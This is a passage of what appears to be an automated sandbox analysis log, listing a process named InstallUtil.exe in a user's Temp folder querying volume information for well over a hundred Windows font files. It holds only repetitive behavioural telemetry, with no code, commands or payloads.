Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe  Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
